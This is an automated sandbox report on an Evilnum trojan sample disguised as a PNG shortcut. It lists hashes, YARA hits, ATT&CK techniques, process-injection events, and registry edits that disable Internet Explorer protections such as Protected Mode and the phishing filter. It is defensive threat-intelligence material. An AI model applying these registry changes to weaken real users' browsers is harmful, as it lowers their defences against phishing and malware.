evilnum | 83f1af96b4a15b3b8ec7490de83555000800779d6456ccd017ba02623704f80c

Analysis

max time kernel
164s
max time network
177s
platform
windows10_x64
resource
win10-en-20211208
submitted
24-01-2022 04:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3.png.lnk
Size

46KB
MD5

12fd4e486b418914dbeedc4effc73426
SHA1

eb046deb4bdf36461bb828967ce15d5123637cee
SHA256

b89cc69c63894c4b263be5a7b7390d3f8500a8ed4834882a7282ebca301e528e
SHA512

302251bedfc04c3b94e6ad6d785aa3623db4b25a05006eca60ef33ab70d6af1a224516deb4c5d33ada0fe2faf2773ca183905c6e65bce2e3fd196ec8beaa2195

Score

10^/10

evilnum trojan

Malware Config

Signatures

EvilNum JS Component 3 IoCs

resource	yara_rule
behavioral4/files/0x000700000001ab19-118.dat	evilnum_js
behavioral4/files/0x000500000001ab28-119.dat	evilnum_js
behavioral4/files/0x000800000001ab19-120.dat	evilnum_js

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum

Deletes itself 1 IoCs

pid	Process
3224	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer Automatic Crash Recovery 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\AutoRecover = "2"	reg.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\PhishingFilter	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "1"	reg.exe

Modifies Internet Explorer Protected Mode 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	reg.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	reg.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListPreviousDownloadUrl = "https://iecvlist.microsoft.com/IE11/1478281996/iecompatviewlist.xml"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "24967568"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "99342664"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\Check_Associations = "no"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\AutoRecover = "2"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 008b0d14beedd701	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2CCE4F81-59B1-11EC-876A-6664D7CF0FE9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce0000000002000000000010660000000100002000000069183b445504d5d543f9aa42399d567b46a76344d9ce700e875c6850a1eedd07000000000e8000000002000020000000dae544fe9a194ce06803ca7b62500a45209c8638272c13bc835845cc97a90bbe2000000004cb3701fef3f3623d351db5603e7afd9d69cb0a91eae03c11839942cb43de8240000000dfd62c28c25b6d21482d33e2d67d6d93dcfc84d4eb5c04e752549eee01141b423458c627fe682abc0fd94ccc936997c7adc4b8105fa0c755ec7655b8437b84bb	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce0000000002000000000010660000000100002000000083dded1fd4cf6326f64697477a1856208a6ad323300d1a469d05739ceaf2dfb4000000000e8000000002000020000000cc80e05be2b9ef3639dfc4eae761dc1e750edb22f24abceba17dd989e82002ca20020000b492dfd046409bc3c35b1ea65d82e14e49ec5b5001933e15832637f2cd0529ba98df2c2ef2564c2f1f6c1abfeb5d14fe257081cb6349f525d8cbaef4662a7e255d9cd98a992315f34be581a5cbec9d0b0b4640efaa1e31e31e955b4843b949a2a27b59a50baae2461cbbc3316c08c9b6e1edb34b184c6fc8079dabbbe66b5dcc1d2ad8ac64720801a86a3a90e1c87c2c4b23c4f437ce54c8ca41cc5067b4162f82ac127eade5f3b208e41bc10312dd03b7058ff7524d652561677ab2cc2aa11332db1240c596e466e7a8755df31547a5641716aa7dbd3a538e2294e584bfba6722167f6f13cafc62c5b7be2850a43d5d56af617a420772cf23e119703da8357a5fea20ce2710e9b544ca81fcf4ce348005d8cd5cb7021e9481ee467b1e3ef33d46d3d13606a772ba10775787f3fffd34f5565ed26c9aa0d383123c676e95bbdc174da6c604e59665fb252743a216097ded8bbeb0c1b8119a14f052387e1d1f57a5a2522fe1eae08fcd5c91090855b7dd3a04681f806cd735a601962d8e931cfc972521b1649ac36f1492ed225f69190cd0c4acb239a9283dbb301b2f373054c3fc74955d812c09bc9f0ea9d6e3e7a96fa0e46f4344cb04545e83b272029fe1fd6d132eceed04814a05d17df1793bfeeee26a9ad714dd0a8e7bb5c9c1c4346144b9c8533b6933219ca6a06e4ba01f698f167d64e881ee0214d452297e3a7d4706f8f9f0635b184b3989b3c1c4b7ff7172852ed6a1da46788bb6bff9fa21c4186e400000006c055698b6162d4ee339efa8f53e4976b087f8899b1fb053b5dddac6d4ef78c0c483fdc1640ad21ea3a5817fd333c32ca4d1bb28801acaafb58f85bd582e200a	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce0000000002000000000010660000000100002000000075db360dd58a7a747961c33496e3b9f3b471bc5c9698a85bec2931b61cb52fdc000000000e80000000020000200000006433c325ada00c86dc745b57080c75b57d4783f1e8cd9e5c3151944ce4cc4c5820020000a31dc1050a7cdef25f0f37561129f2810b9869bbe3ca881f5ed93c7dc5f6468017ee4e1547dfc157ffca8bc2c856d141be191cd82ea4e8a948bf27239aea96532cde31c39ecd05a24bd5e062469ce5fbff50cd1d9e65cf3cfb5bf6e913e58ca199a12acbdeb8f85270e45b076f09ce2a0e2a85829caca1e0ebfa6beaf9c10740f6a8d30f21aaae099a5e586bc953e03e387bca5e442357f57105a9fb5e97519376deb55990b296f589984d07874118cdcd8ab256430753a4c757f6425bb1cb2bc8105f539b06a632dddcd2110cc1974577b16aca18b724f48c4d3bca77812ca95312d5188fb8c7e714e3ea74ce40cd1449ed3da5cb3610191898936f1a80c7c2105204e033b46e25a2ccd0808ea4b4dbd57f3d217b58f67f2ce6866866265492cded195657a1ef3019b84d264f69764a508eb61afe3f1d8ce92b2b99ffc68294fe16dfc5bffcbd655dfcfafee7a4fb6426fa22a98b86ae23d7621558f9b622ddd24450b1ac45a80c3de4ef50e23361db2f5d6ce98d4ce7e5f1f66d05b77a1e0ffee9c8bc58642a86ad5a8f39fb537720543040e64c3cc16d83561c5a830d9376a5f24d35c4b2cb81c7b633e134c9894a0b374d01b2950c67490adfe4176ac467f2e1b826a7d0e64a5d5a7072233f96f242647dacac18782f9db77e08a8d3594ae24690eea93c8fb7b1327c7a852f8d2846f31bb0ee80383f2eef51ea54bd5b74b5c3e4d4be2c2eedf3e1e5e143e71309bc0cdcd65f8157b9f987c26c931e2f9a40000000a57c361f41187ab1b08d90eba4eba7c2bdb5ecc255cd56775676afe4fdb2e6b5ecb617d0ee746e722f59ac563f61ef2a2215c0c3944e164b05d210e2ddc4c75f	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0cf250dbeedd701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce000000000200000000001066000000010000200000006e50f8b6700e440cd185b7559b15dac18c1981e0e546ce7e1edb184ed1a21297000000000e8000000002000020000000d24718b6cbca05b1724632cc5e2a7e1e7533868f285b3b656a79f5f7c8043e7c200000008dde85a786f079eaa3290410ef2374552b1f8a87d690430b252644fe15d628804000000039af6b39920a6ae4dbe5edee536faad9b7795717563c149b4a786cf86b3d1aad59fe641220521db29405dc06b8d05540fe3e6bfadd413c2f5915eec6989eb729	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce00000000020000000000106600000001000020000000c0c11cf732b23a343b6d1ac14fcb0f53a953fe379e892aed4a4171cfaff2dca0000000000e80000000020000200000006c2a53bcd83141015c54195f1685f7e831e806d84bc8755c3e0ce1b1bc31bbf720020000b75bdb27bfd8ef36be7697d994c32bd78f005414bb1b342d31607479fba55738627724e8811cc671f9fb930ea16a03008eeec118f9631e261f6ae180a971387d65d21c5ce27680677284129e899291d36b5daa1de26397316333133a8b7b37735f3313d662b275c787a81052e69ba40c9e3d7940e06491802ec2d01ded3e197313c8a062a67bf8a65d1175b8c508fb413d0ce09d02713fe4ba9bfc76a0cf4af1d7c7d2ba02cd6896888a8b413cd87f71aa504b0ec46031547619c9e1c98f0239fbb1c93a94c5c3df3cff44140d4da0b1d262385cc85859ab074cec836296e24c18971ef9fbc6654e6b1eb76febfcfd4b02dfc41396503be79f5fdc2d46721b28360cd5650c2bf77b764a9045838620e8d02777e43cc6bcec96e3cbf7de1b176fe87a5bcc709180da6746d24f8196e42cc5db492b418e350c927d347a2ff6635821b1251a0ea84fa23c4afb02e7c805a204bc1ef25dbf210f8ebedff77b0213df5b559e65f9b1ecdf586c17cd67a13657cad1ea63ceed8bd385790ae71eba6c5a1c349b41ce1c6959a7390edf36e72a56c7b935a7765e821759fad27b76fcad6876832ca5da721ede1dda69b919a3bcebf95e5ff6fb62343c08b976a2a3cd5096d47f7923516f11b47427545a86915df4577f0ae406b1fb15a3c0154b45c69bf9adadc6be5abc6f85ab7132be40a876d62e0c0fb96460167a592db5d2e36d7fce61d54dee6230f1694625bfe932e33911f6abc344a3dca4e23cdd178a54dfcd914000000029e26a643afab93a6e4e89fc79a1139ef3035043fa4c2ef13db5a3e320eb03e71428cc47246626d0c7d5272683db66a15bc9b0d58a0f2d1753619c1c707ea10f	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListPingRandomizedBitmap = a20200000000d73a	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce00000000020000000000106600000001000020000000c0d6012b4c257eace756d5bf817350a7d8eddef68d2df9a4859358836c88a21b000000000e8000000002000020000000e0891c5cf464f8be7edf695ad3773dda250f36d33579c7d2246140a67cbca9aa20020000d335cd13b9a1086cd10028dc0ee1e5b8bdfff8fce8c6b9a5aed9d39853eec445ca23fda08621d27853c68887516f32c61aa98cd05d6185f01c5f019380d07602a29fa370ccabb6e4e5bcbbe45005e5877956b0582497661aa6c934c37525e5d44ebddafdaec3bcd6e24b3b73e8708c1b99d0ba00988a3126730ae4c71e630643be76f31ed14a6051bd508afd0a95217579801c202dfdf29270f82b665a76943dc66e0183b42e4696ef4e57fd90b12dbb676e51fe16a46fdd2360dbbf022bea99e989c25540fc71693d656a5bd036bdeb7242744b623348a1510c8760bab18f1c37c49190a7e357bffe755d9d62c3ba0ce9513676886f1cac0f5eb231920c3bd292cde1a4cb3b018c1b11f540e000c4063a4823f71f97b9e83c6a3862c43a803630ddea017c84278d1a02f3a774469b7579c9fb80779e3a69683c6c61e451410cacd793595291e173345a0ce04eba9f5262664eb813ae4418857398ea6cad263d6070217b9b938b61b3af2b69f5786553ce1d190d7342cf7723722a67fb650f92f361adefc8ea6507477af474865c3cf6fa460b0b650b2a4502bd476102d9a6d4354e5137a43822645efb132e9e4d19964f487565e589f284139acece3665d4533cbb3076e42cac7722c2e528140d69a80630be7e9cdafe1fc50b2282dded9f3bddd2101f44a2fcd84a33a580e19616f97b7a2b04f238dd0ed839d01ab8d56fc72ec7694d02d387da197faf785b1ade088f7d7e9fd0499e59b77f07ff32ff1a9440000000bb4e32e129895b85fd810eb4d95f903d06e9fed339aebeb062966d77c6f6fac944048ca83abb41b6feabb1e47e3d7862837257a74caf7e170642e406112b6e0b	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395205209"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce00000000020000000000106600000001000020000000b5c78649a6bd06d6cded259c765cda4b172c30cb1ad4ec2dc3c102437f4c9bf1000000000e8000000002000020000000b5f59b53c0de3fd57e636a105c3fe99b10f36315c843e58f07f70ab347f37c5460010000be0b3f19a9099b32197999aebbc796d653afe820cdbe644311b42bc4c3ca901e85a64a3e2df7f633c3283ae842ba80d39ea58e8d7869fa88577e0ec78843f1e88235bf5fc5fc85e893c48b4141bd7069f4941c112fc0383cb4ddffc2ef390dd8d0e9471bd2088753528cc2fcd8f344fb1ada580ae426104413a1f1fbe1f32c138ae32443abbda9dbe2b4fd613d1d8bbaaaa80a41020c2b3eaab07d3809d40a93b33397a084b654e0e1cff2e803caf0730ab8ed436ff36d06ce62caa7e41d2655f42d7fb0b7bebaa0a76b69dbe45bf3af51f6f5862ef17a5a34519cac5a9b9521a335faeb7beeca09286bacdc23a6c5b430c02d934f455cdae3a40099bcb3c0fa49c7d74d64fa022fa2115030515e47d44e4900e75283e38e31bf532def99fa6d745985092b70bc24836e13d2ec9f1fb44a8ec6e61bbe2e8dea8a8c0012e612b433af135274d63f2128d9dff58af58d580281d679dcffa2d4d94be48ee5695480400000001b6b1d3e71c9cb16e83d6f8796eaca2364d547251798201f08b91597c8193402343c2cb152a4384cbaacd8fbfaab8f5a335ad0ebb5b7c723b278122c7dd9163a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\IE10RunOncePerInstallCompleted = "1"	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce0000000002000000000010660000000100002000000016b90589f5974c0a433f92cf5394e96fdfe7dcd2e2418f2cb9e348b9732a57ab000000000e8000000002000020000000d4a6e90fc905e367d73ae74af15e8450aef0cba09de78ec6259a4a9173a023d0200000005220941500511e1e909d12cd95e6831bba419e6218b5cb95f905ac0c9c4858ec40000000dd07272fd4f25c0878a80383cb0314e3f86ea1489093377fe9032272a72fab048721c6e996b9ae665f5d5ab0b563c39366e3e13f7a1d3a52ce2bf592827d73ba	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80564112beedd701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 903e0713beedd701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce0000000002000000000010660000000100002000000027289a2378114887412d0b5b5d7d6d4a90c05aa0963ab51895ff0c152529511f000000000e80000000020000200000007036e9f45068f44f9c56c22bbe314a516e06927eeadfcbcfd38c83a2459efa476001000014407c2efc2462bb5f6a48c100a0db4f341fa92a2692e34fa89f258e1174cc5ecce63e61227113bf6c616821273d68a5a5174b135d30b07757ccd32023ab88624483f49497c2b941e92e641fe685a1d2ea4b3107322a7b84203323d5e3c50debb8deae37d3fd83d36e4b72e3009fbbe87bfaca47062ea078b7c56b802d6770367276f610129e4d97ee6f9786185215202bf7682372e79e031be5c4e110f0e2b2bd1580bb52a2b516da4515660e4bc5aec3c8d5170cd7f8d7ccc8f83ba3a88e70661b7cd5413013319930560135602efd406339e55c9997fae360eb5b3496bb5e2d8b6d50decd5036402cc00f8697b80b180e0458882c37ba9637398d26a609de09a17f22750838dfca3546c9eb7b87d706ad20bdc9a6b8455bd1dafb2c5c2af39381c567622a9935600b1ea6070848c24c1bf126974bb8508906e8ab04fa6dae73d54f95982a5d0704bca1388e2fd62dc39d440b27524b7d2b5946e7548d4704400000000fdff7b1738c1df106ee84e7071435bb4b21eb8d3bec0321c620513929b5db042e99cb8a101e17e412f443be6037bf468a86bcc19a910dddd4884a31efba1897	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListPingBitmap = e20200000000d73a	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30928318"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListPingLastYMD = e5070c0005000a000c00040007008001	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30928318"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b039ad0bbeedd701	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce00000000020000000000106600000001000020000000863bc9d14a0ed0cabf8095a8378109ad7e6b99a246577f7c45740e8417a4a1cb000000000e8000000002000020000000c9bb12cbde672002f75738607506ad0594324b043ea20244771b2ff69638df2c20020000a953717362d6b4d7d48261dd260d8c5cc5a69652d14f9ef63ba24303f6e074d9cc7554127d4cb39c6912da918533c42d79857e254c9257846f034c4073cda24c7906522ee7c3db6e24810b882c19a5d73d30e293061dd4740acac47800944d69b32fa86c557db0604a4742f74a5e574adbcc402d8dafdf8525ce5af9f19b4d0a665264d1d850bb5533f8a6ed9e26b071ae22f72262a5bdf7e069681512e86278fd612e9d44102b9e8de04beac9aeaeafd83a4053cd735f8d4b5fe2ca065ca75c92ecd3189fa560ee8ff22b0da4ca28620007f32329549ab9dee96635537da9110efbc0222f62a0bde1207295651ee76dcb819906b71eeb291bcb93fd5f5403835bb286ea81251b8def97220e3daf27379f39fdb1c157f28d5b48534d853abe4324427a05f4065b98a7abd208be36b3fe9f01ac77132b6d33590caab6f94ea62fdc217967c336ecbe19d53dd5423b6be03011f3e1ad52a7ca44a690c509913cab91f8a4decbdf22eff15958a078168efe8f0b66c5504261ac76599b926a6a997c0b97848421d701305b606bd81fc888598d54d7e1e0522e05fb957c691dbe13ac9d8be56d40ad87847066e204e4ec621dfcab64738d47a8ee824971a33c7a978d3c3507af820b77e32afe375a0ee6df53263f59fd22048e93746eb0b0a4f715d52218e60b15f375652b777388ca6cef4057d701aa9b1edab2c4cadf2f0a6f595823e30c5537aa52f45c0353bf1fecbf441b99b7248e45b69527b94fc7d06bcfb9400000001f353a1fb15102746ef6fe05cfa60d59f5144f17d5f821f23f1b53ec455add8a071626ed3d8a5af4a6eeb5baafbed8d232fc2001517e3f03c4b57ff80f720d79	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListLastUpdateTime = "3689892"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30928318"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Recovery	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000073ba28bec77bbe4ba4dd58ffcd9527ce000000000200000000001066000000010000200000007f710be4c2e714a431f7130bea437283cd5e1748d1edb3867d841a2588b39fde000000000e800000000200002000000087567b190ce7191271921172c591882a69c3f77e2d498f6fee4e2ef6962bf88020000000a41cafa18f5de1df63076527e86240e2750cdd9d99f5ff3f000843b284a160a440000000e482973d655659bf45fa56f38c03db1cac2a3b75e9ce55ec75044960c3d7abd81a2e07163004ea3d5ee46165c66b1cba5c03e24855b5395666e722c1b71c4676	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "24967568"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395205209"	iexplore.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
3824	cmd.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1564	iexplore.exe
1564	iexplore.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1564	iexplore.exe
1564	iexplore.exe
4056	IEXPLORE.EXE
4056	IEXPLORE.EXE
1564	iexplore.exe
1564	iexplore.exe
1624	IEXPLORE.EXE
1624	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1364 wrote to memory of 3824	1364	cmd.exe	70
PID 1364 wrote to memory of 3824	1364	cmd.exe	70
PID 3824 wrote to memory of 1228	3824	cmd.exe	71
PID 3824 wrote to memory of 1228	3824	cmd.exe	71
PID 3824 wrote to memory of 1416	3824	cmd.exe	72
PID 3824 wrote to memory of 1416	3824	cmd.exe	72
PID 3824 wrote to memory of 1256	3824	cmd.exe	73
PID 3824 wrote to memory of 1256	3824	cmd.exe	73
